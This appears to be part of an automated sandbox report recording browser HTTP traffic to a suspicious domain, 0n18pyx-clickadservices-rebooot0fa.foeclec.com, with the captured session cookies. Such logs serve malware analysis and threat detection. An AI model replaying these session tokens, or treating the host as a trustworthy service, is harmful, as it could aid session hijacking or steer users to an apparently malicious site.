      Source: global trafficHTTP traffic detected: GET /89hjocAARSebIS27gFLCdefRWidDS8kUab76 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /efe0FwcSrW02P356lNUUbLQa82mn100 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /34XulaQandSR5aTPghBsor84ndx89103 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3DSec-WebSocket-Key: JXOwk1JwJpvkrupdQd7qRQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
      Source: global trafficHTTP traffic detected: GET /klU9KZQ56usLE89rVZhW6EvSGnlmL6U9fLwsF2zEvKwopEY9bQKaO7rWoafPGfbDjab230 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /klMyUbEL6fKFla9Kr8ExT4Sp0CURklZAPvRG8XprsvgVF6eR20YVyojUy5uv216 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /klU9KZQ56usLE89rVZhW6EvSGnlmL6U9fLwsF2zEvKwopEY9bQKaO7rWoafPGfbDjab230 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /qzgXe6GTtpy9MQNktQ1m82zcabjeVXbE6XxvQzPom7 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /uv6rIFznx1ttRnsWBQkXMgsteCK16wIxP3EEivS6Lgi834130 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /qrYOIGH4BKN8SNOJLeflWipzJBhyIs3HEHEROTD45140 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /mnd5uDf70EKBz5cwqXlyQ3qijWRFcxrrFTVjS278142 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /klD379FF2GM6zPm33HgL5klVO4I4SQpHwx80Z7Yl1r1coRtBxGS3beU878163 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /klMyUbEL6fKFla9Kr8ExT4Sp0CURklZAPvRG8XprsvgVF6eR20YVyojUy5uv216 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; 